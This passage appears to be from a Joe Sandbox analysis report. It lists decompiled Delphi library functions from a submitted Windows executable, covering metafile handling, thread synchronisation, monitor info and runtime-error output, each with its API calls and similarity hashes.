				 *((intOrPtr*)(_t103 + 0x10)) = MulDiv(_v26 - _v30, 0x9ec, _v24 & 0x0000ffff);
				_v54.mm = 8;
				_v54.xExt = 0;
				_v54.yExt = 0;
				_v54.hMF = 0;
				_t119 = SetWinMetaFileBits(_v12, _v16, 0,  &_v54);
				 *(_t103 + 8) = _t119;
				if(_t119 == 0) {
					E00426DF0();
				}
				GetEnhMetaFileHeader( *(_t103 + 8), 0x64,  &_v154);
				_v54.mm = 8;
				_v54.xExt = _v122;
				_v54.yExt = _v118;
				_v54.hMF = 0;
				DeleteEnhMetaFile( *(_t103 + 8));
				_t120 = SetWinMetaFileBits(_v12, _v16, 0,  &_v54);
				 *(_t103 + 8) = _t120;
				if(_t120 == 0) {
					E00426DF0();
				}
				 *((char*)(_t122 + 0x2c)) = 0;
				_pop(_t115);
				 *[fs:eax] = _t115;
				_push(0x42947a);
				return E00402AFC(_v16);
			}



























      0x00429305
      0x00429307
      0x00429310
      0x00429313
      0x00429316
      0x0042931a
      0x0042931f
      0x0042932c
      0x00429336
      0x00429346
      0x00429346
      0x0042934b
      0x00429357
      0x0042935a
      0x00429368
      0x00429376
      0x00429380
      0x00429389
      0x0042938b
      0x0042938b
      0x004293ab
      0x004293c8
      0x004293cb
      0x004293d4
      0x004293d9
      0x004293de
      0x004293f4
      0x004293f6
      0x004293fb
      0x004293fd
      0x004293fd
      0x0042940f
      0x00429414
      0x0042941e
      0x00429424
      0x00429429
      0x00429430
      0x00429448
      0x0042944a
      0x0042944f
      0x00429451
      0x00429451
      0x00429456
      0x0042945c
      0x0042945f
      0x00429462
      0x00429472

      APIs
      • MulDiv.KERNEL32(?,000009EC,00000000), ref: 004293A6
      • MulDiv.KERNEL32(?,000009EC,00000000), ref: 004293C3
      • SetWinMetaFileBits.GDI32(00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC,00000000), ref: 004293EF
      • GetEnhMetaFileHeader.GDI32(00000016,00000064,?,00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC,00000000), ref: 0042940F
      • DeleteEnhMetaFile.GDI32(00000016), ref: 00429430
      • SetWinMetaFileBits.GDI32(00000016,?,00000000,00000008,00000016,00000064,?,00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC), ref: 00429443
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: FileMeta$Bits$DeleteHeader
      • String ID: `
      • API String ID: 1990453761-2679148245
      • Opcode ID: c70c0cbaaa0cf432047515090c5fbfeef7bbd5a3c38b86fe825dfe7e07abbbc4
      • Instruction ID: eb1afa40dfcb3bfe3e874fe61b1bf41d7d0a77a2e976b9a762e975979b7a9039
      • Opcode Fuzzy Hash: c70c0cbaaa0cf432047515090c5fbfeef7bbd5a3c38b86fe825dfe7e07abbbc4
      • Instruction Fuzzy Hash: 99412D75E04218AFDB00DFA9D885AAEB7F9EF48710F50806AF804F7281D7789D41CB69
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0042202C Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109threadCOMMON
      Download Yara Rule
      C-Code - Quality: 69%
      			E0042202C(void* __eax, void* __ebx, void* __edi, void* __esi) {
				char _v5;
				intOrPtr* _v12;
				long _v16;
				char _v20;
				char _v24;
				long _t22;
				char _t29;
				void* _t53;
				intOrPtr _t55;
				intOrPtr* _t62;
				intOrPtr _t63;
				void* _t72;
				void* _t73;
				intOrPtr _t74;

				_t72 = _t73;
				_t74 = _t73 + 0xffffffec;
				_push(__esi);
				_push(__edi);
				_t53 = __eax;
				_t22 = GetCurrentThreadId();
				_t62 =  *0x48f9dc; // 0x490030
				if(_t22 !=  *_t62) {
					_v24 = GetCurrentThreadId();
					_v20 = 0;
					_t3 =  &_v24; // 0x464f40
					_t55 =  *0x48f83c; // 0x415d00
					E0040CCE4(_t53, _t55, 1, __edi, __esi, 0, _t3);
					E004043D0();
				}
				if(_t53 <= 0) {
					E00421FE0();
				} else {
					E00421FEC(_t53);
				}
				_v16 = 0;
				_push(0x490868);
				L00406FE8();
				_push(_t72);
				_push(0x4221ba);
				_push( *[fs:eax]);
				 *[fs:eax] = _t74;
				_v16 = InterlockedExchange( &E0048E494, _v16);
				_push(_t72);
				_push(0x42219b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t74;
				if(_v16 == 0 ||  *((intOrPtr*)(_v16 + 8)) <= 0) {
					_t29 = 0;
				} else {
					_t29 = 1;
				}
				_v5 = _t29;
				if(_v5 == 0) {
					L14:
					_pop(_t63);
					 *[fs:eax] = _t63;
					_push(E004221A2);
					return E00403BF0(_v16);
				} else {
					if( *((intOrPtr*)(_v16 + 8)) > 0) {
						_v12 = E00419C84(_v16, _t55, 0);
						E00419B60(_v16, _t55, 0);
						L00407188();
						 *[fs:eax] = _t74;
						 *[fs:eax] = _t74;
						 *((intOrPtr*)( *_v12 + 8))( *[fs:eax], 0x422136, _t72,  *[fs:eax], 0x422165, _t72, 0x490868);
						 *[fs:eax] = 0;
						 *[fs:eax] = 0;
						_push(E0042216C);
						_push(0x490868);
						L00406FE8();
						return 0;
					} else {
						goto L14;
					}
				}
			}

















      0x0042202d
      0x0042202f
      0x00422033
      0x00422034
      0x00422035
      0x00422037
      0x0042203c
      0x00422044
      0x0042204b
      0x0042204e
      0x00422052
      0x00422058
      0x00422065
      0x0042206a
      0x0042206a
      0x00422071
      0x0042207c
      0x00422073
      0x00422075
      0x00422075
      0x00422083
      0x00422086
      0x0042208b
      0x00422092
      0x00422093
      0x00422098
      0x0042209b
      0x004220ac
      0x004220b1
      0x004220b2
      0x004220b7
      0x004220ba
      0x004220c1
      0x004220cc
      0x004220d0
      0x004220d0
      0x004220d0
      0x004220d2
      0x004220d9
      0x00422185
      0x00422187
      0x0042218a
      0x0042218d
      0x0042219a
      0x004220df
      0x0042217f
      0x004220ee
      0x004220f6
      0x00422100
      0x00422110
      0x0042211e
      0x00422129
      0x00422131
      0x00422152
      0x00422155
      0x0042215a
      0x0042215f
      0x00422164
      0x00000000
      0x00000000
      0x00000000
      0x0042217f

      APIs
      • GetCurrentThreadId.KERNEL32 ref: 00422037
      • GetCurrentThreadId.KERNEL32 ref: 00422046
        • Part of subcall function 00421FE0: ResetEvent.KERNEL32(00000254,00422081,?,?,00000000), ref: 00421FE6
      • RtlEnterCriticalSection.KERNEL32(00490868,?,?,00000000), ref: 0042208B
      • InterlockedExchange.KERNEL32(0048E494,?), ref: 004220A7
      • RtlLeaveCriticalSection.KERNEL32(00490868,00000000,0042219B,?,00000000,004221BA,?,00490868,?,?,00000000), ref: 00422100
      • RtlEnterCriticalSection.KERNEL32(00490868,0042216C,0042219B,?,00000000,004221BA,?,00490868,?,?,00000000), ref: 0042215F
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: CriticalSection$CurrentEnterThread$EventExchangeInterlockedLeaveReset
      • String ID: @OF
      • API String ID: 2189153385-1736827837
      • Opcode ID: 149f8e27e13d624c581fed08b48e38f9c382e053cd755e0e7d752abf1c3a380d
      • Instruction ID: cd502d4b382624c6988545c56fafd93e8fca2965e23c47e5a9cd19c41e20e1d4
      • Opcode Fuzzy Hash: 149f8e27e13d624c581fed08b48e38f9c382e053cd755e0e7d752abf1c3a380d
      • Instruction Fuzzy Hash: 8431A530B04244BFD701EF65E952E6EB7B4EB49704FA1847BF900D26A1D7BC5D10CA29
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00422474 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 73synchronizationthreadCOMMON
      Download Yara Rule
      C-Code - Quality: 44%
      			E00422474(char __edx) {
				char _v8;
				void* _v12;
				char _v16;
				void* __ebp;
				long _t11;
				long _t16;
				void* _t29;
				intOrPtr* _t36;
				intOrPtr _t38;
				void* _t42;
				void* _t44;
				intOrPtr _t45;

				_t42 = _t44;
				_t45 = _t44 + 0xfffffff4;
				_v8 = __edx;
				_t11 = GetCurrentThreadId();
				_t36 =  *0x48f9dc; // 0x490030
				if(_t11 !=  *_t36) {
					_v12 = CreateEventA(0, 0xffffffff, 0, 0);
					_push(_t42);
					_push(0x422596);
					_push( *[fs:eax]);
					 *[fs:eax] = _t45;
					_push(0x490868);
					L00406FE8();
					_push(_t42);
					_push(0x422578);
					_push( *[fs:eax]);
					 *[fs:eax] = _t45;
					if(E0048E494 == 0) {
						E0048E494 = E00403BC0(1);
					}
					_v16 = _v8;
					_t16 = E0048E494; // 0x0
					E00419B14(_t16,  &_v16);
					E00422008();
					if( *0x48e482 != 0) {
						 *0x48e480();
					}
					_push(0x490868);
					L00407188();
					_push(_t42);
					_push(0x422559);
					_push( *[fs:eax]);
					 *[fs:eax] = _t45;
					WaitForSingleObject(_v12, 0xffffffff);
					_pop(_t38);
					 *[fs:eax] = _t38;
					_push(0x422560);
					_push(0x490868);
					L00406FE8();
					return 0;
				} else {
					_t29 =  *((intOrPtr*)(_v8 + 8))();
					return _t29;
				}
			}















      0x00422475
      0x00422477
      0x0042247b
      0x0042247e
      0x00422483
      0x0042248b
      0x004224a8
      0x004224ad
      0x004224ae
      0x004224b3
      0x004224b6
      0x004224b9
      0x004224be
      0x004224c5
      0x004224c6
      0x004224cb
      0x004224ce
      0x004224d8
      0x004224e6
      0x004224e6
      0x004224ee
      0x004224f4
      0x004224f9
      0x004224fe
      0x0042250b
      0x00422518
      0x00422518
      0x0042251e
      0x00422523
      0x0042252a
      0x0042252b
      0x00422530
      0x00422533
      0x0042253c
      0x00422543
      0x00422546
      0x00422549
      0x0042254e
      0x00422553
      0x00422558
      0x0042248d
      0x00422493
      0x004225b2
      0x004225b2

      APIs
      • GetCurrentThreadId.KERNEL32 ref: 0042247E
      • CreateEventA.KERNEL32(00000000,000000FF,00000000,00000000), ref: 004224A3
      • RtlEnterCriticalSection.KERNEL32(00490868,00000000,00422596,?,00000000,000000FF,00000000,00000000), ref: 004224BE
      • RtlLeaveCriticalSection.KERNEL32(00490868,00000000,00422578,?,00490868,00000000,00422596,?,00000000,000000FF,00000000,00000000), ref: 00422523
      • WaitForSingleObject.KERNEL32(?,000000FF,00000000,00422559,?,00490868,00000000,00422578,?,00490868,00000000,00422596,?,00000000,000000FF,00000000), ref: 0042253C
      • RtlEnterCriticalSection.KERNEL32(00490868,00422560,00422559,?,00490868,00000000,00422578,?,00490868,00000000,00422596,?,00000000,000000FF,00000000,00000000), ref: 00422553
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: CriticalSection$Enter$CreateCurrentEventLeaveObjectSingleThreadWait
      • String ID: @[F
      • API String ID: 1504017990-1227568360
      • Opcode ID: 51a803340c9a434a2d0f293eb959d3d7dc066b3503f076a8bf74edb9b7588612
      • Instruction ID: 12241e6b59ce215c5536ab36e4f3ddb836dcc0c393d45776743e860750913383
      • Opcode Fuzzy Hash: 51a803340c9a434a2d0f293eb959d3d7dc066b3503f076a8bf74edb9b7588612
      • Instruction Fuzzy Hash: 04210630B00204BFC711EF56ED92A197BB4E709714FA14ABAF818A76E1C678A910DB5D
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0042D868 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 68stringCOMMON
      Download Yara Rule
      C-Code - Quality: 67%
      			E0042D868(struct HMONITOR__* _a4, struct tagMONITORINFO* _a8) {
				void _v20;
				void* __ebx;
				void* __esi;
				void* __ebp;
				void* _t23;
				int _t24;
				struct HMONITOR__* _t27;
				struct tagMONITORINFO* _t29;
				intOrPtr* _t31;

				_t29 = _a8;
				_t27 = _a4;
				if( *0x490930 != 0) {
					_t24 = 0;
					if(_t27 == 0x12340042 && _t29 != 0 && _t29->cbSize >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
						_t29->rcMonitor.left = 0;
						_t29->rcMonitor.top = 0;
						_t29->rcMonitor.right = GetSystemMetrics(0);
						_t29->rcMonitor.bottom = GetSystemMetrics(1);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t31 = _t29;
						 *(_t31 + 0x24) = 1;
						if( *_t31 >= 0x4c) {
							_push("DISPLAY");
							_push(_t31 + 0x28);
							L00407238();
						}
						_t24 = 1;
					}
				} else {
					 *0x490914 = E0042D52C(4, _t23, "GetMonitorInfo",  *0x490914, _t29);
					_t24 = GetMonitorInfoA(_t27, _t29);
				}
				return _t24;
			}












      0x0042d871
      0x0042d874
      0x0042d87e
      0x0042d8a3
      0x0042d8ab
      0x0042d8cb
      0x0042d8d0
      0x0042d8db
      0x0042d8e6
      0x0042d8f0
      0x0042d8f1
      0x0042d8f2
      0x0042d8f3
      0x0042d8f4
      0x0042d8f5
      0x0042d8ff
      0x0042d901
      0x0042d909
      0x0042d90a
      0x0042d90a
      0x0042d90f
      0x0042d90f
      0x0042d880
      0x0042d892
      0x0042d89f
      0x0042d89f
      0x0042d919

      APIs
      • GetMonitorInfoA.USER32(?,?), ref: 0042D899
      • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0042D8C0
      • GetSystemMetrics.USER32 ref: 0042D8D5
      • GetSystemMetrics.USER32 ref: 0042D8E0
      • lstrcpy.KERNEL32(?,DISPLAY), ref: 0042D90A
        • Part of subcall function 0042D52C: GetProcAddress.KERNEL32(75BA0000,00000000), ref: 0042D5B0
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: System$InfoMetrics$AddressMonitorParametersProclstrcpy
      • String ID: DISPLAY$GetMonitorInfo
      • API String ID: 1539801207-1633989206
      • Opcode ID: 6f5a8ceb695d748fedf5634cb3c749f35a4bdc65b2e4f3c355e56c03c40c738a
      • Instruction ID: 0fb2df7bddb07980b2394ff693f064d5f870649fe5961cb5cfd9019e3fba580e
      • Opcode Fuzzy Hash: 6f5a8ceb695d748fedf5634cb3c749f35a4bdc65b2e4f3c355e56c03c40c738a
      • Instruction Fuzzy Hash: 5C11A2B1B053146EE7209F61AC44BB7B7E8EF5A310F40053BF84597251D774A9448BA9
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00406B5D Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 41threadCOMMON
      Download Yara Rule
      C-Code - Quality: 100%
      			E00406B5D(void* __eax, void* __ebx, void* __ecx, intOrPtr* __edi) {
				long _t11;
				void* _t16;

				_t16 = __ebx;
				 *__edi =  *__edi + __ecx;
				 *((intOrPtr*)(__eax - 0x4905b8)) =  *((intOrPtr*)(__eax - 0x4905b8)) + __eax - 0x4905b8;
				 *0x48e008 = 2;
				 *0x490014 = 0x401270;
				 *0x490018 = 0x401280;
				 *0x49004a = 2;
				 *0x490000 = E00405930;
				if(E00403A2C() != 0) {
					_t3 = E00403A5C();
				}
				E00403B20(_t3);
				 *0x490050 = 0xd7b0;
				 *0x49021c = 0xd7b0;
				 *0x4903e8 = 0xd7b0;
				 *0x49003c = GetCommandLineA();
				 *0x490038 = E004013B0();
				if((GetVersion() & 0x80000000) == 0x80000000) {
					 *0x4905bc = E00406A94(GetThreadLocale(), _t16, __eflags);
				} else {
					if((GetVersion() & 0x000000ff) <= 4) {
						 *0x4905bc = E00406A94(GetThreadLocale(), _t16, __eflags);
					} else {
						 *0x4905bc = 3;
					}
				}
				_t11 = GetCurrentThreadId();
				 *0x490030 = _t11;
				return _t11;
			}





      0x00406b5d
      0x00406b62
      0x00406b67
      0x00406b69
      0x00406b70
      0x00406b7a
      0x00406b84
      0x00406b8b
      0x00406b9c
      0x00406b9e
      0x00406b9e
      0x00406ba3
      0x00406ba8
      0x00406bb1
      0x00406bba
      0x00406bc8
      0x00406bd2
      0x00406be6
      0x00406c1f
      0x00406be8
      0x00406bf6
      0x00406c0e
      0x00406bf8
      0x00406bf8
      0x00406bf8
      0x00406bf6
      0x00406c24
      0x00406c29
      0x00406c2e

      APIs
        • Part of subcall function 00403A2C: GetKeyboardType.USER32(00000000), ref: 00403A31
        • Part of subcall function 00403A2C: GetKeyboardType.USER32(00000001), ref: 00403A3D
      • GetCommandLineA.KERNEL32 ref: 00406BC3
      • GetVersion.KERNEL32 ref: 00406BD7
      • GetVersion.KERNEL32 ref: 00406BE8
      • GetCurrentThreadId.KERNEL32 ref: 00406C24
        • Part of subcall function 00403A5C: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403A7E
        • Part of subcall function 00403A5C: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00403ACD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403AB1
        • Part of subcall function 00403A5C: RegCloseKey.ADVAPI32(?,00403AD4,00000000,?,00000004,00000000,00403ACD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403AC7
      • GetThreadLocale.KERNEL32 ref: 00406C04
        • Part of subcall function 00406A94: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00406AFA), ref: 00406ABA
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: KeyboardLocaleThreadTypeVersion$CloseCommandCurrentInfoLineOpenQueryValue
      • String ID: 4~
      • API String ID: 3734044017-3415945278
      • Opcode ID: 03cbf8656f119b610492588a7c22d81d97224ce5a7e3da469f2081b86af96ee9
      • Instruction ID: 00066901b956dc59c34075870135ec19dc8c66e0ac87c54c66954487910e7bfb
      • Opcode Fuzzy Hash: 03cbf8656f119b610492588a7c22d81d97224ce5a7e3da469f2081b86af96ee9
      • Instruction Fuzzy Hash: 85011EB1814341DEF750FFA2A8463093EA0AB22358F51847FE441662F2EB7C5155CF6E
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00404838 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON
      Download Yara Rule
      C-Code - Quality: 79%
      			E00404838(void* __ecx) {
				long _v4;
				int _t3;

				if( *0x490048 == 0) {
					if( *0x48e030 == 0) {
						_t3 = MessageBoxA(0, "Runtime error     at 00000000", "Error", 0);
					}
					return _t3;
				} else {
					if( *0x49021c == 0xd7b2 &&  *0x490224 > 0) {
						 *0x490234();
					}
					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1e,  &_v4, 0);
					return WriteFile(GetStdHandle(0xfffffff5), E004048C0, 2,  &_v4, 0);
				}
			}





      0x00404840
      0x004048a0
      0x004048b0
      0x004048b0
      0x004048b6
      0x00404842
      0x0040484b
      0x0040485b
      0x0040485b
      0x00404877
      0x00404898
      0x00404898

      APIs
      • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00404902,?,?,?,?,00000002,004049AE,00402BFF,00402C47,Audio CD Grabber), ref: 00404871
      • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00404902,?,?,?,?,00000002,004049AE,00402BFF,00402C47), ref: 00404877
      • GetStdHandle.KERNEL32(000000F5,004048C0,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00404902), ref: 0040488C
      • WriteFile.KERNEL32(00000000,000000F5,004048C0,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00404902), ref: 00404892
      • MessageBoxA.USER32 ref: 004048B0
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: FileHandleWrite$Message
      • String ID: Error$Runtime error at 00000000
      • API String ID: 1570097196-2970929446
      • Opcode ID: 23fc649ffee0dcfef728a3e757cbe38c60e0bc56f9c90a4c00a8b79567053278
      • Instruction ID: 5886380a2466568d730d40b072b26329d42cdc3fae813bc8d9266abe6ff83f02
      • Opcode Fuzzy Hash: 23fc649ffee0dcfef728a3e757cbe38c60e0bc56f9c90a4c00a8b79567053278
      • Instruction Fuzzy Hash: 4FF090A6A843847DEA6073B69C0BF5D22485792F15F608FBFB210B40E297FC58C4832D
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00451E94 Relevance: 12.2, APIs: 8, Instructions: 170COMMON
      Download Yara Rule
      C-Code - Quality: 39%
      			E00451E94(void* __eax, intOrPtr __ecx, intOrPtr __edx, void* __eflags, char _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v28;
				char _v44;
				void* __edi;
				void* __ebp;
				void* _t46;
				void* _t57;
				intOrPtr _t85;
				intOrPtr _t96;
				void* _t117;
				void* _t118;
				void* _t127;
				struct HDC__* _t136;
				struct HDC__* _t137;
				intOrPtr* _t138;
				void* _t139;

				_t119 = __ecx;
				_t135 = __ecx;
				_v8 = __edx;
				_t118 = __eax;
				_t46 = E004519AC(__eax);
				if(_t46 != 0) {
					_t142 = _a4;
					if(_a4 == 0) {
						__eflags =  *((intOrPtr*)(_t118 + 0x54));
						if( *((intOrPtr*)(_t118 + 0x54)) == 0) {
							_t138 = E0042A918(1);
							 *((intOrPtr*)(_t118 + 0x54)) = _t138;
							E0042BC58(_t138, 1);
							 *((intOrPtr*)( *_t138 + 0x40))();
							_t119 =  *_t138;
							 *((intOrPtr*)( *_t138 + 0x34))();
						}
						E004262F8( *((intOrPtr*)(E0042AEE8( *((intOrPtr*)(_t118 + 0x54))) + 0x14)), _t119, 0xffffff, _t135, _t139, __eflags);
						E00418618(0,  *((intOrPtr*)(_t118 + 0x34)), 0,  &_v44,  *((intOrPtr*)(_t118 + 0x30)));
						_push( &_v44);
						_t57 = E0042AEE8( *((intOrPtr*)(_t118 + 0x54)));
						_pop(_t127);
						E0042669C(_t57, _t127);
						_push(0);
						_push(0);
						_push(0xffffffff);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push(E00426B00(E0042AEE8( *((intOrPtr*)(_t118 + 0x54)))));
						_push(_v8);
						_push(E00451B70(_t118));
						L0042D02C();
						E00418618(_a16, _a16 +  *((intOrPtr*)(_t118 + 0x34)), _a12,  &_v28, _a12 +  *((intOrPtr*)(_t118 + 0x30)));
						_v12 = E00426B00(E0042AEE8( *((intOrPtr*)(_t118 + 0x54))));
						E004262F8( *((intOrPtr*)(_t135 + 0x14)), _a16 +  *((intOrPtr*)(_t118 + 0x34)), 0xff000014, _t135, _t139, __eflags);
						_t136 = E00426B00(_t135);
						SetTextColor(_t136, 0xffffff);
						SetBkColor(_t136, 0);
						_push(0xe20746);
						_push(0);
						_push(0);
						_push(_v12);
						_push( *((intOrPtr*)(_t118 + 0x30)));
						_push( *((intOrPtr*)(_t118 + 0x34)));
						_push(_a12 + 1);
						_t85 = _a16 + 1;
